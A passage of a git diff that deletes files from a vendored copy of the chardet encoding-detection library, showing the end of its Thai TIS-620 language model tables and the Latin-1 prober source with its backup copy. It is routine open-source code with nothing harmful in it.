from a limited sample (1M). - -# Character Mapping Table: -TIS620CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40 -188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50 -253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60 - 96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70 -209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222, -223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235, -236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57, - 49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54, - 45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63, - 22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244, - 11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247, - 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 92.6386% -# first 1024 sequences:7.3177% -# rest sequences: 1.0230% -# negative sequences: 0.0436% -ThaiLangModel = ( \ -0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, -0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, -3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, -0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1, -3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2, -3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1, -3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2, -3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1, -3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1, -3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1, -2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1, -3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1, -0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1, -0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2, -1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0, -3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3, -3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0, -1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2, -0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3, -0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0, -3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1, -2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0, -3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2, -0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2, -3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, -3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0, -2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2, -3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1, -2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1, -3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0, -3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1, -3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1, -3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1, -1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2, -0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3, -0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1, -3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0, -3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1, -1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0, -3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1, -3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2, -0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0, -0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0, -1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1, -1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1, -3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1, -0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0, -3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0, -0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1, -0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0, -0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1, -0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1, -0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0, -0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1, -0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0, -3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0, -0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0, -0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0, -3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1, -2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1, -0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0, -3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0, -1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0, -1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0, -1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -) - -TIS620ThaiModel = { \ - 'charToOrderMap': TIS620CharToOrderMap, - 'precedenceMatrix': ThaiLangModel, - 'mTypicalPositiveRatio': 0.926386, - 'keepEnglishLetter': constants.False, - 'charsetName': "TIS-620" -} diff --git a/chardet/chardet/langthaimodel.pyc b/chardet/chardet/langthaimodel.pyc deleted file mode 100644 index 38b86d7..0000000 Binary files a/chardet/chardet/langthaimodel.pyc and /dev/null differ diff --git a/chardet/chardet/latin1prober.py b/chardet/chardet/latin1prober.py deleted file mode 100644 index 6ecc022..0000000 --- a/chardet/chardet/latin1prober.py +++ /dev/null @@ -1,135 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .charsetprober import CharSetProber -from . import constants - -FREQ_CAT_NUM = 4 - -UDF = 0 # undefined -OTH = 1 # other -ASC = 2 # ascii capital letter -ASS = 3 # ascii small letter -ACV = 4 # accent capital vowel -ACO = 5 # accent capital other -ASV = 6 # accent small vowel -ASO = 7 # accent small other -CLASS_NUM = 8 # total classes - -Latin1_CharToClass = ( \ - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F - OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 - ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F - OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 - ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F - OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 - OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F - UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 - OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF - ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 - ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF - ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 - ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF - ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 - ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF - ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 - ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF -) - -# 0 : illegal -# 1 : very unlikely -# 2 : normal -# 3 : very likely -Latin1ClassModel = ( \ -# UDF OTH ASC ASS ACV ACO ASV ASO - 0, 0, 0, 0, 0, 0, 0, 0, # UDF - 0, 3, 3, 3, 3, 3, 3, 3, # OTH - 0, 3, 3, 3, 3, 3, 3, 3, # ASC - 0, 3, 3, 3, 1, 1, 3, 3, # ASS - 0, 3, 3, 3, 1, 2, 1, 2, # ACV - 0, 3, 3, 3, 3, 3, 3, 3, # ACO - 0, 3, 1, 3, 1, 1, 1, 3, # ASV - 0, 3, 1, 3, 1, 1, 3, 3, # ASO -) - -class Latin1Prober(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self.reset() - - def reset(self): - self._mLastCharClass = OTH - self._mFreqCounter = [0] * FREQ_CAT_NUM - CharSetProber.reset(self) - - def get_charset_name(self): - return "windows-1252" - - def feed(self, aBuf): - aBuf = self.filter_with_english_letters(aBuf) - for c in aBuf: - charClass = Latin1_CharToClass[c] - freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass] - if freq == 0: - self._mState = constants.eNotMe - break - self._mFreqCounter[freq] += 1 - self._mLastCharClass = charClass - - return self.get_state() - - def get_confidence(self): - if self.get_state() == constants.eNotMe: - return 0.01 - - total = sum(self._mFreqCounter) - if total < 0.01: - confidence = 0.0 - else: - confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total) - if confidence < 0.0: - confidence = 0.0 - # lower the confidence of latin1 so that other more accurate detector - # can take priority. - confidence = confidence * 0.5 - return confidence diff --git a/chardet/chardet/latin1prober.py.bak b/chardet/chardet/latin1prober.py.bak deleted file mode 100644 index b46129b..0000000 --- a/chardet/chardet/latin1prober.py.bak +++ /dev/null @@ -1,136 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from charsetprober import CharSetProber -import constants -import operator - -FREQ_CAT_NUM = 4 - -UDF = 0 # undefined -OTH = 1 # other -ASC = 2 # ascii capital letter -ASS = 3 # ascii small letter -ACV = 4 # accent capital vowel -ACO = 5 # accent capital other -ASV = 6 # accent small vowel -ASO = 7 # accent small other -CLASS_NUM = 8 # total classes - -Latin1_CharToClass = ( \ - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F - OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 - ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F - OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 - ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F - OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 - OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F - UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 - OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF - ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 - ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF - ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 - ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF - ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 - ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF - ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 - ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF -) - -# 0 : illegal -# 1 : very unlikely -# 2 : normal -# 3 : very likely -Latin1ClassModel = ( \ -# UDF OTH ASC ASS ACV ACO ASV ASO - 0, 0, 0, 0, 0, 0, 0, 0, # UDF - 0, 3, 3, 3, 3, 3, 3, 3, # OTH - 0, 3, 3, 3, 3, 3, 3, 3, # ASC - 0, 3, 3, 3, 1, 1, 3, 3, # ASS - 0, 3, 3, 3, 1, 2, 1, 2, # ACV - 0, 3, 3, 3, 3, 3, 3, 3, # ACO - 0, 3, 1, 3, 1, 1, 1, 3, # ASV - 0, 3, 1, 3, 1, 1, 3, 3, # ASO -) - -class Latin1Prober(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self.reset() - - def reset(self): - self._mLastCharClass = OTH - self._mFreqCounter = [0] * FREQ_CAT_NUM - CharSetProber.reset(self) - - def get_charset_name(self): - return "windows-1252" - - def feed(self, aBuf): - aBuf = self.filter_with_english_letters(aBuf) - for c in aBuf: - charClass = Latin1_CharToClass[ord(c)] - freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass] - if freq == 0: - self._mState = constants.eNotMe - break - self._mFreqCounter[freq] += 1 - self._mLastCharClass = charClass - - return self.get_state() - - def get_confidence(self): - if self.get_state() == constants.eNotMe: - return 0.01 - - total = reduce(operator.add, self._mFreqCounter) - if total < 0.01: - confidence = 0.0 - else: - confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total) - if confidence < 0.0: - confidence = 0.0 - # lower the confidence 